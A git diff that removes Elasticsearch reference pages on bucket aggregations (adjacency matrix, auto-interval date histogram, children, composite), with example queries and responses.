-include::bucket/filters-aggregation.asciidoc[] - -include::bucket/geodistance-aggregation.asciidoc[] - -include::bucket/geohashgrid-aggregation.asciidoc[] - -include::bucket/geotilegrid-aggregation.asciidoc[] - -include::bucket/global-aggregation.asciidoc[] - -include::bucket/histogram-aggregation.asciidoc[] - -include::bucket/iprange-aggregation.asciidoc[] - -include::bucket/missing-aggregation.asciidoc[] - -include::bucket/nested-aggregation.asciidoc[] - -include::bucket/parent-aggregation.asciidoc[] - -include::bucket/range-aggregation.asciidoc[] - -include::bucket/rare-terms-aggregation.asciidoc[] - -include::bucket/reverse-nested-aggregation.asciidoc[] - -include::bucket/sampler-aggregation.asciidoc[] - -include::bucket/significantterms-aggregation.asciidoc[] - -include::bucket/significanttext-aggregation.asciidoc[] - -include::bucket/terms-aggregation.asciidoc[] - -include::bucket/variablewidthhistogram-aggregation.asciidoc[] - -include::bucket/range-field-note.asciidoc[] diff --git a/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc b/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc deleted file mode 100644 index 407695dc2ed..00000000000 --- a/docs/reference/aggregations/bucket/adjacency-matrix-aggregation.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[search-aggregations-bucket-adjacency-matrix-aggregation]] -=== Adjacency matrix aggregation -++++ -Adjacency matrix -++++ - -A bucket aggregation returning a form of 
{wikipedia}/Adjacency_matrix[adjacency matrix]. -The request provides a collection of named filter expressions, similar to the `filters` aggregation -request. -Each bucket in the response represents a non-empty cell in the matrix of intersecting filters. - -Given filters named `A`, `B` and `C` the response would return buckets with the following names: - - -[options="header"] -|======================= -| h|A h|B h|C -h|A |A |A&B |A&C -h|B | |B |B&C -h|C | | |C -|======================= - -The intersecting buckets e.g `A&C` are labelled using a combination of the two filter names separated by -the ampersand character. Note that the response does not also include a "C&A" bucket as this would be the -same set of documents as "A&C". The matrix is said to be _symmetric_ so we only return half of it. To do this we sort -the filter name strings and always use the lowest of a pair as the value to the left of the "&" separator. - -An alternative `separator` parameter can be passed in the request if clients wish to use a separator string -other than the default of the ampersand. - - -Example: - -[source,console] --------------------------------------------------- -PUT /emails/_bulk?refresh -{ "index" : { "_id" : 1 } } -{ "accounts" : ["hillary", "sidney"]} -{ "index" : { "_id" : 2 } } -{ "accounts" : ["hillary", "donald"]} -{ "index" : { "_id" : 3 } } -{ "accounts" : ["vladimir", "donald"]} - -GET emails/_search -{ - "size": 0, - "aggs" : { - "interactions" : { - "adjacency_matrix" : { - "filters" : { - "grpA" : { "terms" : { "accounts" : ["hillary", "sidney"] }}, - "grpB" : { "terms" : { "accounts" : ["donald", "mitt"] }}, - "grpC" : { "terms" : { "accounts" : ["vladimir", "nigel"] }} - } - } - } - } -} --------------------------------------------------- - -In the above example, we analyse email messages to see which groups of individuals -have exchanged messages. -We will get counts for each group individually and also a count of messages for pairs -of groups that have recorded interactions. - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "interactions": { - "buckets": [ - { - "key":"grpA", - "doc_count": 2 - }, - { - "key":"grpA&grpB", - "doc_count": 1 - }, - { - "key":"grpB", - "doc_count": 2 - }, - { - "key":"grpB&grpC", - "doc_count": 1 - }, - { - "key":"grpC", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Usage -On its own this aggregation can provide all of the data required to create an undirected weighted graph. -However, when used with child aggregations such as a `date_histogram` the results can provide the -additional levels of data required to perform {wikipedia}/Dynamic_network_analysis[dynamic network analysis] -where examining interactions _over time_ becomes important. - -==== Limitations -For N filters the matrix of buckets produced can be N²/2 and so there is a default maximum -imposed of 100 filters . This setting can be changed using the `index.max_adjacency_matrix_filters` index-level setting -(note this setting is deprecated and will be repaced with `indices.query.bool.max_clause_count` in 8.0+). 
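As a small illustration of the `separator` option mentioned earlier, the sketch below reuses the `emails` example and replaces the default ampersand so that intersection keys come back as, for example, `grpA_AND_grpB`. The separator string itself is arbitrary and only needs to suit whatever consumes the keys.

[source,console]
----
GET emails/_search
{
  "size": 0,
  "aggs": {
    "interactions": {
      "adjacency_matrix": {
        "separator": "_AND_",
        "filters": {
          "grpA": { "terms": { "accounts": [ "hillary", "sidney" ] } },
          "grpB": { "terms": { "accounts": [ "donald", "mitt" ] } }
        }
      }
    }
  }
}
----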
diff --git a/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc deleted file mode 100644 index 8f8912a29d6..00000000000 --- a/docs/reference/aggregations/bucket/autodatehistogram-aggregation.asciidoc +++ /dev/null @@ -1,316 +0,0 @@ -[[search-aggregations-bucket-autodatehistogram-aggregation]] -=== Auto-interval date histogram aggregation -++++ -Auto-interval date histogram -++++ - -A multi-bucket aggregation similar to the <> except -instead of providing an interval to use as the width of each bucket, a target number of buckets is provided -indicating the number of buckets needed and the interval of the buckets is automatically chosen to best achieve -that target. The number of buckets returned will always be less than or equal to this target number. - -The buckets field is optional, and will default to 10 buckets if not specified. - -Requesting a target of 10 buckets. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "auto_date_histogram": { - "field": "date", - "buckets": 10 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Keys - -Internally, a date is represented as a 64 bit number representing a timestamp -in milliseconds-since-the-epoch. These timestamps are returned as the bucket -++key++s. The `key_as_string` is the same timestamp converted to a formatted -date string using the format specified with the `format` parameter: - -TIP: If no `format` is specified, then it will use the first date -<> specified in the field mapping. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "auto_date_histogram": { - "field": "date", - "buckets": 5, - "format": "yyyy-MM-dd" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Supports expressive date <> - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": [ - { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - ], - "interval": "1M" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Intervals - -The interval of the returned buckets is selected based on the data collected by the -aggregation so that the number of buckets returned is less than or equal to the number -requested. The possible intervals returned are: - -[horizontal] -seconds:: In multiples of 1, 5, 10 and 30 -minutes:: In multiples of 1, 5, 10 and 30 -hours:: In multiples of 1, 3 and 12 -days:: In multiples of 1, and 7 -months:: In multiples of 1, and 3 -years:: In multiples of 1, 5, 10, 20, 50 and 100 - -In the worst case, where the number of daily buckets are too many for the requested -number of buckets, the number of buckets returned will be 1/7th of the number of -buckets requested. - -==== Time Zone - -Date-times are stored in Elasticsearch in UTC. By default, all bucketing and -rounding is also done in UTC. 
The `time_zone` parameter can be used to indicate -that bucketing should use a different time zone. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as a timezone id, an identifier used in the TZ database like -`America/Los_Angeles`. - -Consider the following example: - -[source,console] ---------------------------------- -PUT my-index-00001/log/1?refresh -{ - "date": "2015-10-01T00:30:00Z" -} - -PUT my-index-00001/log/2?refresh -{ - "date": "2015-10-01T01:30:00Z" -} - -PUT my-index-00001/log/3?refresh -{ - "date": "2015-10-01T02:30:00Z" -} - -GET my-index-00001/_search?size=0 -{ - "aggs": { - "by_day": { - "auto_date_histogram": { - "field": "date", - "buckets" : 3 - } - } - } -} ---------------------------------- - -UTC is used if no time zone is specified, three 1-hour buckets are returned -starting at midnight UTC on 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-10-01T00:00:00.000Z", - "key": 1443657600000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T01:00:00.000Z", - "key": 1443661200000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T02:00:00.000Z", - "key": 1443664800000, - "doc_count": 1 - } - ], - "interval": "1h" - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -If a `time_zone` of `-01:00` is specified, then midnight starts at one hour before -midnight UTC: - -[source,console] ---------------------------------- -GET my-index-00001/_search?size=0 -{ - "aggs": { - "by_day": { - "auto_date_histogram": { - "field": "date", - "buckets" : 3, - "time_zone": "-01:00" - } - } - } -} ---------------------------------- -// TEST[continued] - - -Now three 1-hour buckets are still returned but the first bucket starts at -11:00pm on 30 September 2015 since that is the local time for the bucket in -the specified time zone. - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T23:00:00.000-01:00", <1> - "key": 1443657600000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T00:00:00.000-01:00", - "key": 1443661200000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T01:00:00.000-01:00", - "key": 1443664800000, - "doc_count": 1 - } - ], - "interval": "1h" - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The `key_as_string` value represents midnight on each day - in the specified time zone. - -WARNING: When using time zones that follow DST (daylight savings time) changes, -buckets close to the moment when those changes happen can have slightly different -sizes than neighbouring buckets. -For example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am, -clocks were turned forward 1 hour to 3am local time. If the result of the aggregation -was daily buckets, the bucket covering that day will only hold data for 23 hours -instead of the usual 24 hours for other buckets. The same is true for shorter intervals -like e.g. 12h. Here, we will have only a 11h bucket on the morning of 27 March when the -DST shift happens. - -==== Scripts - -Like with the normal <>, both document level -scripts and value level scripts are supported. 
This aggregation does not, however, support the `min_doc_count`,
-`extended_bounds`, `hard_bounds` and `order` parameters.
-
-==== Minimum Interval parameter
-
-The `minimum_interval` allows the caller to specify the minimum rounding interval that should be used.
-This can make the collection process more efficient, as the aggregation will not attempt to round at
-any interval lower than `minimum_interval`.
-
-The accepted units for `minimum_interval` are:
-
-* year
-* month
-* day
-* hour
-* minute
-* second
-
-[source,console]
---------------------------------------------------
-POST /sales/_search?size=0
-{
-  "aggs": {
-    "sale_date": {
-      "auto_date_histogram": {
-        "field": "date",
-        "buckets": 10,
-        "minimum_interval": "minute"
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:sales]
-
-==== Missing value
-
-The `missing` parameter defines how documents that are missing a value should be treated.
-By default, they will be ignored, but it is also possible to treat them as if they
-had a value.
-
-[source,console]
---------------------------------------------------
-POST /sales/_search?size=0
-{
-  "aggs": {
-    "sale_date": {
-      "auto_date_histogram": {
-        "field": "date",
-        "buckets": 10,
-        "missing": "2000/01/01" <1>
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:sales]
-
-<1> Documents without a value in the `date` field will fall into the same bucket as documents that have the value `2000/01/01`.
-
diff --git a/docs/reference/aggregations/bucket/children-aggregation.asciidoc b/docs/reference/aggregations/bucket/children-aggregation.asciidoc
deleted file mode 100644
index fb355caeaa4..00000000000
--- a/docs/reference/aggregations/bucket/children-aggregation.asciidoc
+++ /dev/null
@@ -1,226 +0,0 @@
-[[search-aggregations-bucket-children-aggregation]]
-=== Children aggregation
-++++
-Children
-++++
-
-A special single bucket aggregation that selects child documents that have the specified type, as defined in a <>.
-
-This aggregation has a single option:
-
-* `type` - The child type that should be selected.
-
-For example, let's say we have an index of questions and answers. The answer type has the following `join` field in the mapping:
-
-[source,console]
---------------------------------------------------
-PUT child_example
-{
-  "mappings": {
-    "properties": {
-      "join": {
-        "type": "join",
-        "relations": {
-          "question": "answer"
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-The `question` document contains a tag field and the `answer` documents contain an owner field. With the `children`
-aggregation, the tag buckets can be mapped to the owner buckets in a single request even though the two fields exist in
-two different kinds of documents.
-
-An example of a question document:
-
-[source,console]
---------------------------------------------------
-PUT child_example/_doc/1
-{
-  "join": {
-    "name": "question"
-  },
-  "body": "
I have Windows 2003 server and i bought a new Windows 2008 server...", - "title": "Whats the best way to file transfer my site from server to a newer one?", - "tags": [ - "windows-server-2003", - "windows-server-2008", - "file-transfer" - ] -} --------------------------------------------------- -// TEST[continued] - -Examples of `answer` documents: - -[source,console] --------------------------------------------------- -PUT child_example/_doc/2?routing=1 -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Sam", - "id": 48 - }, - "body": "
Unfortunately you're pretty much limited to FTP...", - "creation_date": "2009-05-04T13:45:37.030" -} - -PUT child_example/_doc/3?routing=1&refresh -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Troll", - "id": 49 - }, - "body": "
Use Linux...", - "creation_date": "2009-05-05T13:45:37.030" -} --------------------------------------------------- -// TEST[continued] - -The following request can be built that connects the two together: - -[source,console] --------------------------------------------------- -POST child_example/_search?size=0 -{ - "aggs": { - "top-tags": { - "terms": { - "field": "tags.keyword", - "size": 10 - }, - "aggs": { - "to-answers": { - "children": { - "type" : "answer" <1> - }, - "aggs": { - "top-names": { - "terms": { - "field": "owner.display_name.keyword", - "size": 10 - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `type` points to type / mapping with the name `answer`. - -The above example returns the top question tags and per tag the top answer owners. - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - "took": 25, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "windows-server-2003", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "windows-server-2008", - "doc_count": 1, <1> - "to-answers": { - "doc_count": 2, <2> - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1 - }, - { - "key": "Troll", - "doc_count": 1 - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] - -<1> The number of question documents with the tag `file-transfer`, `windows-server-2003`, etc. -<2> The number of answer documents that are related to question documents with the tag `file-transfer`, `windows-server-2003`, etc. diff --git a/docs/reference/aggregations/bucket/composite-aggregation.asciidoc b/docs/reference/aggregations/bucket/composite-aggregation.asciidoc deleted file mode 100644 index 8870e63dd2c..00000000000 --- a/docs/reference/aggregations/bucket/composite-aggregation.asciidoc +++ /dev/null @@ -1,859 +0,0 @@ -[[search-aggregations-bucket-composite-aggregation]] -=== Composite aggregation -++++ -Composite -++++ - -A multi-bucket aggregation that creates composite buckets from different sources. - -Unlike the other `multi-bucket` aggregations, you can use the `composite` -aggregation to paginate **all** buckets from a multi-level aggregation -efficiently. This aggregation provides a way to stream **all** buckets of a -specific aggregation, similar to what -<> does for documents. - -The composite buckets are built from the combinations of the -values extracted/created for each document and each combination is considered as -a composite bucket. 
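Before the individual value sources are described in detail, a minimal request may help orient the reader. The sketch below (field name and page size are placeholders) pages through the distinct values of a single `keyword` field, two composite buckets at a time:

[source,console]
----
GET /_search
{
  "size": 0,
  "aggs": {
    "my_buckets": {
      "composite": {
        "size": 2,
        "sources": [
          { "product": { "terms": { "field": "product" } } }
        ]
      }
    }
  }
}
----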
- -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /sales -{ - "mappings": { - "properties": { - "product": { - "type": "keyword" - }, - "timestamp": { - "type": "date" - }, - "price": { - "type": "long" - }, - "shop": { - "type": "keyword" - }, - "location": { - "type": "geo_point" - }, - "nested": { - "type": "nested", - "properties": { - "product": { - "type": "keyword" - }, - "timestamp": { - "type": "date" - }, - "price": { - "type": "long" - }, - "shop": { - "type": "keyword" - } - } - } - } - } -} - -POST /sales/_bulk?refresh -{"index":{"_id":0}} -{"product": "mad max", "price": "20", "timestamp": "2017-05-09T14:35"} -{"index":{"_id":1}} -{"product": "mad max", "price": "25", "timestamp": "2017-05-09T12:35"} -{"index":{"_id":2}} -{"product": "rocky", "price": "10", "timestamp": "2017-05-08T09:10"} -{"index":{"_id":3}} -{"product": "mad max", "price": "27", "timestamp": "2017-05-10T07:07"} -{"index":{"_id":4}} -{"product": "apocalypse now", "price": "10", "timestamp": "2017-05-11T08:35"} -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -For example, consider the following document: - -[source,js] --------------------------------------------------- -{ - "keyword": ["foo", "bar"], - "number": [23, 65, 76] -} --------------------------------------------------- -// NOTCONSOLE - -Using `keyword` and `number` as source fields for the aggregation results in -the following composite buckets: - -[source,js] --------------------------------------------------- -{ "keyword": "foo", "number": 23 } -{ "keyword": "foo", "number": 65 } -{ "keyword": "foo", "number": 76 } -{ "keyword": "bar", "number": 23 } -{ "keyword": "bar", "number": 65 } -{ "keyword": "bar", "number": 76 } --------------------------------------------------- -// NOTCONSOLE - -==== Value sources - -The `sources` parameter defines the source fields to use when building -composite buckets. The order that the `sources` are defined controls the order -that the keys are returned. - -NOTE: You must use a unique name when defining `sources`. - -The `sources` parameter can be any of the following types: - -* <<_terms,Terms>> -* <<_histogram,Histogram>> -* <<_date_histogram,Date histogram>> -* <<_geotile_grid,GeoTile grid>> - -[[_terms]] -===== Terms - -The `terms` value source is equivalent to a simple `terms` aggregation. -The values are extracted from a field or a script exactly like the `terms` aggregation. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- - -Like the `terms` aggregation it is also possible to use a script to create the values for the composite buckets: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "product": { - "terms": { - "script": { - "source": "doc['product'].value", - "lang": "painless" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -[[_histogram]] -===== Histogram - -The `histogram` value source can be applied on numeric values to build fixed size -interval over the values. The `interval` parameter defines how the numeric values should be -transformed. 
For instance an `interval` set to 5 will translate any numeric values to its closest interval, -a value of `101` would be translated to `100` which is the key for the interval between 100 and 105. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "histo": { "histogram": { "field": "price", "interval": 5 } } } - ] - } - } - } -} --------------------------------------------------- - -The values are built from a numeric field or a script that return numerical values: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "histo": { - "histogram": { - "interval": 5, - "script": { - "source": "doc['price'].value", - "lang": "painless" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -[[_date_histogram]] -===== Date histogram - -The `date_histogram` is similar to the `histogram` value source except that the interval -is specified by date/time expression: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } } - ] - } - } - } -} --------------------------------------------------- - -The example above creates an interval per day and translates all `timestamp` values to the start of its closest intervals. -Available expressions for interval: `year`, `quarter`, `month`, `week`, `day`, `hour`, `minute`, `second` - -Time values can also be specified via abbreviations supported by <> parsing. -Note that fractional time values are not supported, but you can address this by shifting to another -time unit (e.g., `1.5h` could instead be specified as `90m`). - -*Format* - -Internally, a date is represented as a 64 bit number representing a timestamp in milliseconds-since-the-epoch. -These timestamps are returned as the bucket keys. It is possible to return a formatted date string instead using -the format specified with the format parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "date": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "1d", - "format": "yyyy-MM-dd" <1> - } - } - } - ] - } - } - } -} --------------------------------------------------- - -<1> Supports expressive date <> - -*Time Zone* - -Date-times are stored in Elasticsearch in UTC. By default, all bucketing and -rounding is also done in UTC. The `time_zone` parameter can be used to indicate -that bucketing should use a different time zone. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. `+01:00` or -`-08:00`) or as a timezone id, an identifier used in the TZ database like -`America/Los_Angeles`. 
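For instance, here is a sketch of a `date_histogram` source that buckets the `timestamp` field (assumed from the surrounding examples) by calendar day in the `America/Los_Angeles` time zone:

[source,console]
----
GET /_search
{
  "size": 0,
  "aggs": {
    "my_buckets": {
      "composite": {
        "sources": [
          {
            "date": {
              "date_histogram": {
                "field": "timestamp",
                "calendar_interval": "1d",
                "time_zone": "America/Los_Angeles"
              }
            }
          }
        ]
      }
    }
  }
}
----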
- -*Offset* - -include::datehistogram-aggregation.asciidoc[tag=offset-explanation] - -[source,console,id=composite-aggregation-datehistogram-offset-example] ----- -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T05:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T06:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "my_buckets": { - "composite" : { - "sources" : [ - { - "date": { - "date_histogram" : { - "field": "date", - "calendar_interval": "day", - "offset": "+6h", - "format": "iso8601" - } - } - } - ] - } - } - } -} ----- - -include::datehistogram-aggregation.asciidoc[tag=offset-result-intro] - -[source,console-result] ----- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { "date": "2015-10-01T06:00:00.000Z" }, - "buckets": [ - { - "key": { "date": "2015-09-30T06:00:00.000Z" }, - "doc_count": 1 - }, - { - "key": { "date": "2015-10-01T06:00:00.000Z" }, - "doc_count": 1 - } - ] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -include::datehistogram-aggregation.asciidoc[tag=offset-note] - -[[_geotile_grid]] -===== GeoTile grid - -The `geotile_grid` value source works on `geo_point` fields and groups points into buckets that represent -cells in a grid. The resulting grid can be sparse and only contains cells -that have matching data. Each cell corresponds to a -{wikipedia}/Tiled_web_map[map tile] as used by many online map -sites. Each cell is labeled using a "{zoom}/{x}/{y}" format, where zoom is equal -to the user-specified precision. - -[source,console,id=composite-aggregation-geotilegrid-example] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "tile": { "geotile_grid": { "field": "location", "precision": 8 } } } - ] - } - } - } -} --------------------------------------------------- - -*Precision* - -The highest-precision geotile of length 29 produces cells that cover -less than 10cm by 10cm of land. This precision is uniquely suited for composite aggregations as each -tile does not have to be generated and loaded in memory. - -See https://wiki.openstreetmap.org/wiki/Zoom_levels[Zoom level documentation] -on how precision (zoom) correlates to size on the ground. Precision for this -aggregation can be between 0 and 29, inclusive. - -*Bounding box filtering* - -The geotile source can optionally be constrained to a specific geo bounding box, which reduces -the range of tiles used. These bounds are useful when only a specific part of a geographical area needs high -precision tiling. - -[source,console,id=composite-aggregation-geotilegrid-boundingbox-example] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { - "tile": { - "geotile_grid": { - "field": "location", - "precision": 22, - "bounds": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - } - } - ] - } - } - } -} --------------------------------------------------- - -===== Mixing different value sources - -The `sources` parameter accepts an array of value sources. -It is possible to mix different value sources to create composite buckets. 
-For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } }, - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- - -This will create composite buckets from the values created by two value sources, a `date_histogram` and a `terms`. -Each bucket is composed of two values, one for each value source defined in the aggregation. -Any type of combinations is allowed and the order in the array is preserved -in the composite buckets. - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "shop": { "terms": { "field": "shop" } } }, - { "product": { "terms": { "field": "product" } } }, - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } } - ] - } - } - } -} --------------------------------------------------- - -==== Order - -By default the composite buckets are sorted by their natural ordering. Values are sorted -in ascending order of their values. When multiple value sources are requested, the ordering is done per value -source, the first value of the composite bucket is compared to the first value of the other composite bucket and if they are equals the -next values in the composite bucket are used for tie-breaking. This means that the composite bucket - `[foo, 100]` is considered smaller than `[foobar, 0]` because `foo` is considered smaller than `foobar`. -It is possible to define the direction of the sort for each value source by setting `order` to `asc` (default value) -or `desc` (descending order) directly in the value source definition. -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product", "order": "asc" } } } - ] - } - } - } -} --------------------------------------------------- - -\... will sort the composite bucket in descending order when comparing values from the `date_histogram` source -and in ascending order when comparing values from the `terms` source. - -==== Missing bucket - -By default documents without a value for a given source are ignored. -It is possible to include them in the response by setting `missing_bucket` to -`true` (defaults to `false`): - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "sources": [ - { "product_name": { "terms": { "field": "product", "missing_bucket": true } } } - ] - } - } - } -} --------------------------------------------------- - -In the example above the source `product_name` will emit an explicit `null` value -for documents without a value for the field `product`. -The `order` specified in the source dictates whether the `null` values should rank -first (ascending order, `asc`) or last (descending order, `desc`). - -==== Size - -The `size` parameter can be set to define how many composite buckets should be returned. 
-Each composite bucket is considered as a single bucket, so setting a size of 10 will return the -first 10 composite buckets created from the value sources. -The response contains the values for each composite bucket in an array containing the values extracted -from each value source. Defaults to `10`. - -==== Pagination - -If the number of composite buckets is too high (or unknown) to be returned in a single response -it is possible to split the retrieval in multiple requests. -Since the composite buckets are flat by nature, the requested `size` is exactly the number of composite buckets -that will be returned in the response (assuming that they are at least `size` composite buckets to return). -If all composite buckets should be retrieved it is preferable to use a small size (`100` or `1000` for instance) -and then use the `after` parameter to retrieve the next results. -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "size": 2, - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d" } } }, - { "product": { "terms": { "field": "product" } } } - ] - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_buckets": { - "after_key": { - "date": 1494288000000, - "product": "mad max" - }, - "buckets": [ - { - "key": { - "date": 1494201600000, - "product": "rocky" - }, - "doc_count": 1 - }, - { - "key": { - "date": 1494288000000, - "product": "mad max" - }, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -To get the next set of buckets, resend the same aggregation with the `after` -parameter set to the `after_key` value returned in the response. -For example, this request uses the `after_key` value provided in the previous response: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "my_buckets": { - "composite": { - "size": 2, - "sources": [ - { "date": { "date_histogram": { "field": "timestamp", "calendar_interval": "1d", "order": "desc" } } }, - { "product": { "terms": { "field": "product", "order": "asc" } } } - ], - "after": { "date": 1494288000000, "product": "mad max" } <1> - } - } - } -} --------------------------------------------------- - -<1> Should restrict the aggregation to buckets that sort **after** the provided values. - -NOTE: The `after_key` is *usually* the key to the last bucket returned in -the response, but that isn't guaranteed. Always use the returned `after_key` instead -of derriving it from the buckets. - -==== Early termination - -For optimal performance the <> should be set on the index so that it matches -parts or fully the source order in the composite aggregation. -For instance the following index sort: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": [ "username", "timestamp" ], <1> - "sort.order": [ "asc", "desc" ] <2> - } - }, - "mappings": { - "properties": { - "username": { - "type": "keyword", - "doc_values": true - }, - "timestamp": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by `username` first then by `timestamp`. 
